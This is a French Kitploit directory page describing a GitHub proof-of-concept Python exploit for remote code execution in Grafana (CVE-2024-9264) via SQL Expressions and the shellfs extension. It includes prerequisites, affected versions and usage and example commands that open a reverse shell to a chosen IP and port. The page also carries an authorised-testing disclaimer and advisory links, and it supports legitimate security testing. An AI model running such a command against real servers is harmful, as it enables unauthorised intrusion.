Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-9264-RCE-Exploit — Exploit RCE Grafana (CVE-2024-9264) | Kitploit
Outils/GitHubGitHub/z3k0sec/cve-2024-9264-rce-exploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationOutil d'Accès à Distance
GitHubz3k0sec/cve-2024-9264-rce-exploit

CVE-2024-9264-RCE-Exploit

Exploit RCE Grafana (CVE-2024-9264)

Voir le dépôt
395il y a 1 anVérifié par Kitploit
Site web

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-9264-RCE-Exploit in Grafana via SQL Expressions

Description

Preuve de concept pour l'exécution de code à distance dans Grafana (CVE-2024-9264)

Ce dépôt contient un script Python qui exploite une vulnérabilité d'exécution de code à distance (RCE) dans la fonctionnalité SQL Expressions de Grafana. En tirant parti d'une désinfection insuffisante des entrées, cet exploit permet à un attaquant d'exécuter des commandes shell arbitraires sur le serveur. Cela est rendu possible grâce à l'extension communautaire shellfs, qui peut être installée et chargée par un attaquant pour faciliter l'exécution de commandes.

Prérequis

  • utilisateur Grafana authentifié avec les autorisations Viewer ou supérieures
  • le binaire DuckDB doit être installé et accessible via le PATH de Grafana

Version concernée

Grafana >= v11.0.0 (toutes les v11.x.y sont concernées)

Utilisation

root@kitploit:~
python3 poc.py [--url <cible>] [--username <nom d'utilisateur>] [--password <mot de passe>] [--reverse-ip <IP>] [--reverse-port <PORT>]

14

Exemple

root@kitploit:~
python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001

Avertissement

Ce script est destiné à des fins éducatives et à une utilisation dans des environnements contrôlés où vous avez l'autorisation de tester la sécurité du système. Une utilisation abusive de cet outil pourrait entraîner des conséquences juridiques.

En savoir plus

https://zekosec.com/blog/file-read-grafana-cve-2024-9264/

https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/

Télécharger l’outil